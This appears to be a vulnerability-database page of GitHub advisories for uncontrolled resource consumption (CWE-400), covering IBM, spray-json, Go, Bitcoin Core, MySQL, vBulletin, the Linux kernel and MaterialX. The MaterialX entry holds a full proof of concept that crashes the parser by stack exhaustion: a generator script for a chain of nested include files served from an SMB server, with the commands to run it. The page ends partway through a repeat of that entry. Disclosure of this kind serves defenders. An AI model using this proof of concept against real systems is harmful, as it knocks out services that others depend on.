Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5425 vulnerabilities reference this CWE, most recent first.

GHSA-Q8X5-G6X2-9X9F

Vulnerability from github – Published: 2023-06-15 03:30 – Updated: 2024-04-04 04:51
VLAI
Details

IBM Security Directory Suite VA 8.0.1 could allow an attacker to cause a denial of service due to uncontrolled resource consumption. IBM X-Force ID: 228588.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-33168"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-15T02:15:09Z",
    "severity": "HIGH"
  },
  "details": "IBM Security Directory Suite VA 8.0.1 could allow an attacker to cause a denial of service due to uncontrolled resource consumption.  IBM X-Force ID:  228588.",
  "id": "GHSA-q8x5-g6x2-9x9f",
  "modified": "2024-04-04T04:51:37Z",
  "published": "2023-06-15T03:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33168"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/228588"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7001885"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q8XJ-8XG3-W432

Vulnerability from github – Published: 2018-11-09 17:41 – Updated: 2022-09-14 22:03
VLAI
Summary
Uncontrolled Resource Consumption in spray-json
Details

Lightbend Spray spray-json through 1.3.4 allows remote attackers to cause a denial of service (resource consumption) because of Algorithmic Complexity during the parsing of many JSON object fields (with keys that have the same hash code).

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.spray:spray-json_2.12"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.spray:spray-json_2.11"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.spray:spray-json_2.10"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.3.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-18854"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:51:29Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Lightbend Spray spray-json through 1.3.4 allows remote attackers to cause a denial of service (resource consumption) because of Algorithmic Complexity during the parsing of many JSON object fields (with keys that have the same hash code).",
  "id": "GHSA-q8xj-8xg3-w432",
  "modified": "2022-09-14T22:03:57Z",
  "published": "2018-11-09T17:41:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18854"
    },
    {
      "type": "WEB",
      "url": "https://github.com/spray/spray-json/issues/277"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-q8xj-8xg3-w432"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/spray/spray-jso"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Uncontrolled Resource Consumption in spray-json"
}

GHSA-Q967-6VC6-RQR5

Vulnerability from github – Published: 2025-07-21 12:30 – Updated: 2025-11-03 21:34
VLAI
Details

A high privileged remote attacker can exhaust critical system resources by sending specifically crafted POST requests to the send-sms action in fast succession.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-41676"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-21T10:15:24Z",
    "severity": "MODERATE"
  },
  "details": "A high privileged remote attacker can exhaust critical system resources by sending specifically crafted POST requests to the send-sms action in fast succession.",
  "id": "GHSA-q967-6vc6-rqr5",
  "modified": "2025-11-03T21:34:09Z",
  "published": "2025-07-21T12:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41676"
    },
    {
      "type": "WEB",
      "url": "https://certvde.com/de/advisories/VDE-2025-058"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2025/Jul/38"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q99M-P7HQ-5V4F

Vulnerability from github – Published: 2022-02-12 00:00 – Updated: 2022-03-30 00:01
VLAI
Details

Rat.SetString in math/big in Go before 1.16.14 and 1.17.x before 1.17.7 has an overflow that can lead to Uncontrolled Memory Consumption.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-23772"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-190",
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-02-11T01:15:00Z",
    "severity": "HIGH"
  },
  "details": "Rat.SetString in math/big in Go before 1.16.14 and 1.17.x before 1.17.7 has an overflow that can lead to Uncontrolled Memory Consumption.",
  "id": "GHSA-q99m-p7hq-5v4f",
  "modified": "2022-03-30T00:01:42Z",
  "published": "2022-02-12T00:00:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23772"
    },
    {
      "type": "WEB",
      "url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00017.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00018.html"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202208-02"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220225-0006"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q9GQ-6CQP-445J

Vulnerability from github – Published: 2023-05-22 06:30 – Updated: 2024-04-04 04:15
VLAI
Details

Bitcoin Core before 24.1, when debug mode is not used, allows attackers to cause a denial of service (CPU consumption) because draining the inventory-to-send queue is inefficient, as exploited in the wild in May 2023.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-33297"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-05-22T05:15:09Z",
    "severity": "HIGH"
  },
  "details": "Bitcoin Core before 24.1, when debug mode is not used, allows attackers to cause a denial of service (CPU consumption) because draining the inventory-to-send queue is inefficient, as exploited in the wild in May 2023.",
  "id": "GHSA-q9gq-6cqp-445j",
  "modified": "2024-04-04T04:15:56Z",
  "published": "2023-05-22T06:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33297"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bitcoin/bitcoin/issues/27586"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bitcoin/bitcoin/issues/27623"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dogecoin/dogecoin/issues/3243#issuecomment-1712575544"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bitcoin/bitcoin/pull/27610"
    },
    {
      "type": "WEB",
      "url": "https://en.bitcoin.it/wiki/Common_Vulnerabilities_and_Exposures"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bitcoin/bitcoin/blob/master/doc/release-notes/release-notes-24.1.md"
    },
    {
      "type": "WEB",
      "url": "https://github.com/visualbasic6/drain"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F2EI7SAP4QP2AJYK2JVEOO4GJ6DOBSM5"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/H3CQY277NWXY3RFCZCJ4VKT2P3ROACEJ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/F2EI7SAP4QP2AJYK2JVEOO4GJ6DOBSM5"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/H3CQY277NWXY3RFCZCJ4VKT2P3ROACEJ"
    },
    {
      "type": "WEB",
      "url": "https://x.com/123456/status/1711601593399828530"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q9GW-32R3-98XH

Vulnerability from github – Published: 2025-10-21 21:33 – Updated: 2025-10-21 21:33
VLAI
Details

Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.0-8.0.43, 8.4.0-8.4.6 and 9.0.0-9.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-53054"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-21T20:20:43Z",
    "severity": "MODERATE"
  },
  "details": "Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB).  Supported versions that are affected are 8.0.0-8.0.43, 8.4.0-8.4.6 and  9.0.0-9.4.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server.  Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as  unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).",
  "id": "GHSA-q9gw-32r3-98xh",
  "modified": "2025-10-21T21:33:42Z",
  "published": "2025-10-21T21:33:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53054"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2025.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q9MH-R9FG-8H8R

Vulnerability from github – Published: 2026-01-20 15:33 – Updated: 2026-02-02 18:31
VLAI
Details

A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive limited storm tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-9282"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-20T14:16:12Z",
    "severity": "HIGH"
  },
  "details": "A security issue exists within ArmorStart\u00ae LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive limited storm tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds.",
  "id": "GHSA-q9mh-r9fg-8h8r",
  "modified": "2026-02-02T18:31:31Z",
  "published": "2026-01-20T15:33:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9282"
    },
    {
      "type": "WEB",
      "url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-Q9RX-45GJ-G3F5

Vulnerability from github – Published: 2025-07-23 18:30 – Updated: 2025-07-23 18:30
VLAI
Details

vBulletin 3.8.7 is vulnerable to a denial-of-service condition via the misc.php?do=buddylist endpoint. If an authenticated user has a sufficiently large buddy list, processing the list can consume excessive memory, exhausting system resources and crashing the forum.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-46171"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-23T16:15:26Z",
    "severity": "MODERATE"
  },
  "details": "vBulletin 3.8.7 is vulnerable to a denial-of-service condition via the misc.php?do=buddylist endpoint. If an authenticated user has a sufficiently large buddy list, processing the list can consume excessive memory, exhausting system resources and crashing the forum.",
  "id": "GHSA-q9rx-45gj-g3f5",
  "modified": "2025-07-23T18:30:36Z",
  "published": "2025-07-23T18:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46171"
    },
    {
      "type": "WEB",
      "url": "https://github.com/oiyl/CVE-2025-46171"
    },
    {
      "type": "WEB",
      "url": "http://vbulletin.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QC27-QR34-95W5

Vulnerability from github – Published: 2024-06-20 12:31 – Updated: 2024-07-03 18:46
VLAI
Details

In the Linux kernel, the following vulnerability has been resolved:

ASoC: codecs: wcd938x: fix incorrect used of portid

Mixer controls have the channel id in mixer->reg, which is not same as port id. port id should be derived from chan_info array. So fix this. Without this, its possible that we could corrupt struct wcd938x_sdw_priv by accessing port_map array out of range with channel id instead of port id.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-48716"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-20T11:15:55Z",
    "severity": "CRITICAL"
  },
  "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd938x: fix incorrect used of portid\n\nMixer controls have the channel id in mixer-\u003ereg, which is not same\nas port id. port id should be derived from chan_info array.\nSo fix this. Without this, its possible that we could corrupt\nstruct wcd938x_sdw_priv by accessing port_map array out of range\nwith channel id instead of port id.",
  "id": "GHSA-qc27-qr34-95w5",
  "modified": "2024-07-03T18:46:08Z",
  "published": "2024-06-20T12:31:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-48716"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/9167f2712dc8c24964840a4d1e2ebf130e846b95"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/aa7152f9f117b3e66b3c0d4158ca4c6d46ab229f"
    },
    {
      "type": "WEB",
      "url": "https://git.kernel.org/stable/c/c5c1546a654f613e291a7c5d6f3660fc1eb6d0c7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QC2H-74X3-4V3W

Vulnerability from github – Published: 2025-07-31 19:37 – Updated: 2025-08-01 18:36
VLAI
Summary
MaterialX Lack of MTLX Import Depth Limit Leads to DoS (Denial-Of-Service) Via Stack Exhaustion
Details

Summary

Nested imports of MaterialX files can lead to a crash via stack memory exhaustion, due to the lack of a limit on the "import chain" depth.

Details

The MaterialX specification supports importing other files by using XInclude tags.

When parsing file imports, recursion is used to process nested files in the form of a tree with the root node being the first MaterialX files parsed.

However, there is no limit imposed to the depth of files that can be parsed by the library, therefore, by building a sufficiently deep chain of MaterialX files one referencing the next, it is possible to crash the process using the MaterialX library via stack exhaustion.

PoC

This test is going to employ Windows UNC paths, in order to make the Proof Of Concept more realistic. In fact, by using windows network shares, an attacker would be able to exploit the vulnerability (in Windows) if they could control the content of a single .mtlx file being parsed.

Note that for the sake of simplicity the PoC will use the MaterialXView application to easily reproduce the vulnerability, however it does not affect MaterialXView directly.

In order to reproduce this test, please follow the steps below:

  1. Compile or download the MaterialXView application in a Windows machine
  2. In a separate Linux machine in the same local network, install the impacket package (the documentation of the package suggests using pipx, as in python3 -m pipx install impacket).
  3. In the Linux machine, create a file named template.mtlx with the following content:
<?xml version="1.0"?>
<materialx version="1.39" colorspace="lin_rec709">
  <xi:include href="\\\\{ip}\\{name}.mtlx"/>
  <surfacematerial name="Aluminum_Brushed" type="material">
    <input name="surfaceshader" type="surfaceshader" nodename="open_pbr_surface_surfaceshader" />
  </surfacematerial>
  <open_pbr_surface name="open_pbr_surface_surfaceshader" type="surfaceshader">
    <input name="base_color" type="color3" value="0.912, 0.914, 0.920" />
    <input name="base_metalness" type="float" value="1.0" />
    <input name="specular_color" type="color3" value="0.970, 0.979, 0.988" />
    <input name="specular_roughness" type="float" value="0.2" />
    <input name="specular_roughness_anisotropy" type="float" value="0.9" />
  </open_pbr_surface>
</materialx>
  1. In the same directory, create a file named script.py with the following content:
import argparse
import uuid
import os
from pathlib import Path

MAX_FILES_PER_DIR = 1024
MAX_DIRECTORIES = 1024

def uuid_generator(count):
    for _ in range(count):
        yield str(uuid.uuid4())

def get_dir_and_file_count(total_files):
    num_dirs = (total_files + MAX_FILES_PER_DIR - 1) // MAX_FILES_PER_DIR
    if num_dirs > MAX_DIRECTORIES:
        raise ValueError(f"Too many files requested. Maximum is {MAX_FILES_PER_DIR * MAX_DIRECTORIES}")
    return num_dirs

def create_materialx_chain(template_path, output_dir, ip_address, share_name, num_iterations):
    with open(template_path, 'r') as f:
        template_content = f.read()

    Path(output_dir).mkdir(parents=True, exist_ok=True)

    dir_count = get_dir_and_file_count(num_iterations)
    dir_uuids = [str(uuid.uuid4()) for _ in range(dir_count)]

    for dir_uuid in dir_uuids:
        Path(os.path.join(output_dir, dir_uuid)).mkdir(exist_ok=True)

    uuid_gen = uuid_generator(num_iterations)
    next_uuid = next(uuid_gen)
    first_file_path = None

    for i in range(num_iterations):
        current_uuid = next_uuid
        next_uuid = next(uuid_gen) if i < num_iterations - 1 else "FINAL"

        dir_index = i // MAX_FILES_PER_DIR
        dir_uuid = dir_uuids[dir_index]

        if next_uuid != "FINAL":
            next_dir_index = (i + 1) // MAX_FILES_PER_DIR
            next_dir_uuid = dir_uuids[next_dir_index]
            include_path = f"{share_name}\\{next_dir_uuid}\\{next_uuid}"
        else:
            include_path = next_uuid

        content = template_content.replace("{ip}", ip_address)
        content = content.replace("{name}", include_path)

        output_path = os.path.join(output_dir, dir_uuid, f"{current_uuid}.mtlx")
        with open(output_path, 'w') as f:
            f.write(content)

        if i == 0:
            first_file_path = f"\\\\{ip_address}\\{share_name}\\{dir_uuid}\\{current_uuid}.mtlx"
            print(f"First file created at UNC path: {first_file_path}")

def main():
    parser = argparse.ArgumentParser(description='Generate chain of MaterialX files')
    parser.add_argument('template', help='Path to template MaterialX file')
    parser.add_argument('output_dir', help='Output directory for generated files')
    parser.add_argument('ip_address', help='IP address to use in file paths')
    parser.add_argument('share_name', help='Share name to use in file paths')
    parser.add_argument('--iterations', type=int, default=10,
                      help='Number of files to generate (default: 10)')

    args = parser.parse_args()

    if args.iterations > MAX_FILES_PER_DIR * MAX_DIRECTORIES:
        print(f"Error: Maximum number of files is {MAX_FILES_PER_DIR * MAX_DIRECTORIES}")
        return

    create_materialx_chain(
        args.template,
        args.output_dir,
        args.ip_address,
        args.share_name,
        args.iterations
    )

if __name__ == "__main__":
    main()
  1. Run the python script with the following command line, replacing the $IP placeholder with the IP address of your interface (the command will take some time to execute): python3 script.py --iterations 1048576 template.mtlx chain $IP chain
    • This will print, in the console, a line documenting the UNC path of the first file of the chain. Copy that path in the clipboard.
  2. Spawn the SMB server by executing the following command line: pipx run --spec impacket smbserver.py -smb2support chain chain/
  3. In the Windows machine, create a MaterialX file with the following content, replacing the $UNCPATH placeholder with the content of the path printed at step 5:
<?xml version="1.0"?>
<materialx version="1.39" colorspace="lin_rec709">
  <xi:include href="$UNCPATH"/>
  <surfacematerial name="Aluminum_Brushed" type="material">
    <input name="surfaceshader" type="surfaceshader" nodename="open_pbr_surface_surfaceshader" />
  </surfacematerial>
  <open_pbr_surface name="open_pbr_surface_surfaceshader" type="surfaceshader">
    <input name="base_color" type="color3" value="0.912, 0.914, 0.920" />
    <input name="base_metalness" type="float" value="1.0" />
    <input name="specular_color" type="color3" value="0.970, 0.979, 0.988" />
    <input name="specular_roughness" type="float" value="0.2" />
    <input name="specular_roughness_anisotropy" type="float" value="0.9" />
  </open_pbr_surface>
</materialx>
  1. Load the MaterialX file in MaterialXView
  2. Notice that the viewer doesn't respond anymore. After some minutes, notice that the viewer crashes, demonstrating the Stack Exhaustion

Note: by consulting the Windows Event Viewer, it is possible to examine the application crash, verifying that it is indeed crashing with a STATUS_STACK_OVERFLOW (0xc00000fd).

Impact

An attacker exploiting this vulnerability would be able to intentionally stall and crash an application reading MaterialX files controlled by them.

In Windows, the attack complexity is lower, since the malicious MaterialX file can reference remote paths via the UNC notation. However, the attack would work in other systems as well, provided that the attacker can write an arbitrary amount of MaterialX files (implementing the chain) in the local file system.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "MaterialX"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.39.2"
            },
            {
              "fixed": "1.39.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.39.2"
      ]
    }
  ],
  "aliases": [
    "CVE-2025-53012"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-31T19:37:51Z",
    "nvd_published_at": "2025-08-01T18:15:54Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nNested imports of MaterialX files can lead to a crash via stack memory exhaustion, due to the lack of a limit on the \"import chain\" depth.\n\n### Details\nThe MaterialX [specification](https://github.com/AcademySoftwareFoundation/MaterialX/blob/main/documents/Specification/MaterialX.Specification.md#mtlx-file-format-definition) supports importing other files by using `XInclude` tags.\n\nWhen parsing file imports, recursion is used to process nested files in the form of a tree with the root node being the first MaterialX files parsed.\n\nHowever, there is no limit imposed to the depth of files that\ncan be parsed by the library, therefore, by building a sufficiently deep chain of MaterialX files one referencing the next, it is possible to crash the process using the MaterialX library via stack exhaustion.\n\n### PoC\nThis test is going to employ Windows UNC paths, in order to make the Proof Of Concept more realistic. In fact, by using windows network shares, an attacker would be able to exploit the vulnerability (in Windows) if they could control the content of a single `.mtlx` file being parsed.\n\nNote that for the sake of simplicity the PoC will use the MaterialXView application to easily reproduce the vulnerability, however it does not affect MaterialXView directly.\n\nIn order to reproduce this test, please follow the steps below:\n\n1. Compile or download the MaterialXView application in a Windows machine\n2. In a separate Linux machine in the same local network, install the `impacket` package (the documentation of the package suggests using `pipx`, as in `python3 -m pipx install impacket\n`). \n3. In the Linux machine, create a file named `template.mtlx` with the following content:\n```xml\n\u003c?xml version=\"1.0\"?\u003e\n\u003cmaterialx version=\"1.39\" colorspace=\"lin_rec709\"\u003e\n  \u003cxi:include href=\"\\\\\\\\{ip}\\\\{name}.mtlx\"/\u003e\n  \u003csurfacematerial name=\"Aluminum_Brushed\" type=\"material\"\u003e\n    \u003cinput name=\"surfaceshader\" type=\"surfaceshader\" nodename=\"open_pbr_surface_surfaceshader\" /\u003e\n  \u003c/surfacematerial\u003e\n  \u003copen_pbr_surface name=\"open_pbr_surface_surfaceshader\" type=\"surfaceshader\"\u003e\n    \u003cinput name=\"base_color\" type=\"color3\" value=\"0.912, 0.914, 0.920\" /\u003e\n    \u003cinput name=\"base_metalness\" type=\"float\" value=\"1.0\" /\u003e\n    \u003cinput name=\"specular_color\" type=\"color3\" value=\"0.970, 0.979, 0.988\" /\u003e\n    \u003cinput name=\"specular_roughness\" type=\"float\" value=\"0.2\" /\u003e\n    \u003cinput name=\"specular_roughness_anisotropy\" type=\"float\" value=\"0.9\" /\u003e\n  \u003c/open_pbr_surface\u003e\n\u003c/materialx\u003e\n```\n4. In the same directory, create a file named `script.py` with the following content:\n```python\nimport argparse\nimport uuid\nimport os\nfrom pathlib import Path\n\nMAX_FILES_PER_DIR = 1024\nMAX_DIRECTORIES = 1024\n\ndef uuid_generator(count):\n    for _ in range(count):\n        yield str(uuid.uuid4())\n\ndef get_dir_and_file_count(total_files):\n    num_dirs = (total_files + MAX_FILES_PER_DIR - 1) // MAX_FILES_PER_DIR\n    if num_dirs \u003e MAX_DIRECTORIES:\n        raise ValueError(f\"Too many files requested. Maximum is {MAX_FILES_PER_DIR * MAX_DIRECTORIES}\")\n    return num_dirs\n\ndef create_materialx_chain(template_path, output_dir, ip_address, share_name, num_iterations):\n    with open(template_path, \u0027r\u0027) as f:\n        template_content = f.read()\n    \n    Path(output_dir).mkdir(parents=True, exist_ok=True)\n    \n    dir_count = get_dir_and_file_count(num_iterations)\n    dir_uuids = [str(uuid.uuid4()) for _ in range(dir_count)]\n    \n    for dir_uuid in dir_uuids:\n        Path(os.path.join(output_dir, dir_uuid)).mkdir(exist_ok=True)\n    \n    uuid_gen = uuid_generator(num_iterations)\n    next_uuid = next(uuid_gen)\n    first_file_path = None\n\n    for i in range(num_iterations):\n        current_uuid = next_uuid\n        next_uuid = next(uuid_gen) if i \u003c num_iterations - 1 else \"FINAL\"\n        \n        dir_index = i // MAX_FILES_PER_DIR\n        dir_uuid = dir_uuids[dir_index]\n        \n        if next_uuid != \"FINAL\":\n            next_dir_index = (i + 1) // MAX_FILES_PER_DIR\n            next_dir_uuid = dir_uuids[next_dir_index]\n            include_path = f\"{share_name}\\\\{next_dir_uuid}\\\\{next_uuid}\"\n        else:\n            include_path = next_uuid\n        \n        content = template_content.replace(\"{ip}\", ip_address)\n        content = content.replace(\"{name}\", include_path)\n        \n        output_path = os.path.join(output_dir, dir_uuid, f\"{current_uuid}.mtlx\")\n        with open(output_path, \u0027w\u0027) as f:\n            f.write(content)\n\n        if i == 0:\n            first_file_path = f\"\\\\\\\\{ip_address}\\\\{share_name}\\\\{dir_uuid}\\\\{current_uuid}.mtlx\"\n            print(f\"First file created at UNC path: {first_file_path}\")\n\ndef main():\n    parser = argparse.ArgumentParser(description=\u0027Generate chain of MaterialX files\u0027)\n    parser.add_argument(\u0027template\u0027, help=\u0027Path to template MaterialX file\u0027)\n    parser.add_argument(\u0027output_dir\u0027, help=\u0027Output directory for generated files\u0027)\n    parser.add_argument(\u0027ip_address\u0027, help=\u0027IP address to use in file paths\u0027)\n    parser.add_argument(\u0027share_name\u0027, help=\u0027Share name to use in file paths\u0027)\n    parser.add_argument(\u0027--iterations\u0027, type=int, default=10,\n                      help=\u0027Number of files to generate (default: 10)\u0027)\n    \n    args = parser.parse_args()\n    \n    if args.iterations \u003e MAX_FILES_PER_DIR * MAX_DIRECTORIES:\n        print(f\"Error: Maximum number of files is {MAX_FILES_PER_DIR * MAX_DIRECTORIES}\")\n        return\n    \n    create_materialx_chain(\n        args.template,\n        args.output_dir,\n        args.ip_address,\n        args.share_name,\n        args.iterations\n    )\n\nif __name__ == \"__main__\":\n    main()\n```\n5. Run the python script with the following command line, replacing the `$IP` placeholder with the IP address of your interface (the command will take some time to execute): `python3 script.py --iterations 1048576 template.mtlx chain $IP chain`\n    - This will print, in the console, a line documenting the UNC path of the first file of the chain. Copy that path in the clipboard.\n6. Spawn the SMB server by executing the following command line: `pipx run --spec impacket smbserver.py -smb2support chain chain/`\n7. In the Windows machine, create a MaterialX file with the following content, replacing the `$UNCPATH` placeholder with the content of the path printed at step 5:\n```\n\u003c?xml version=\"1.0\"?\u003e\n\u003cmaterialx version=\"1.39\" colorspace=\"lin_rec709\"\u003e\n  \u003cxi:include href=\"$UNCPATH\"/\u003e\n  \u003csurfacematerial name=\"Aluminum_Brushed\" type=\"material\"\u003e\n    \u003cinput name=\"surfaceshader\" type=\"surfaceshader\" nodename=\"open_pbr_surface_surfaceshader\" /\u003e\n  \u003c/surfacematerial\u003e\n  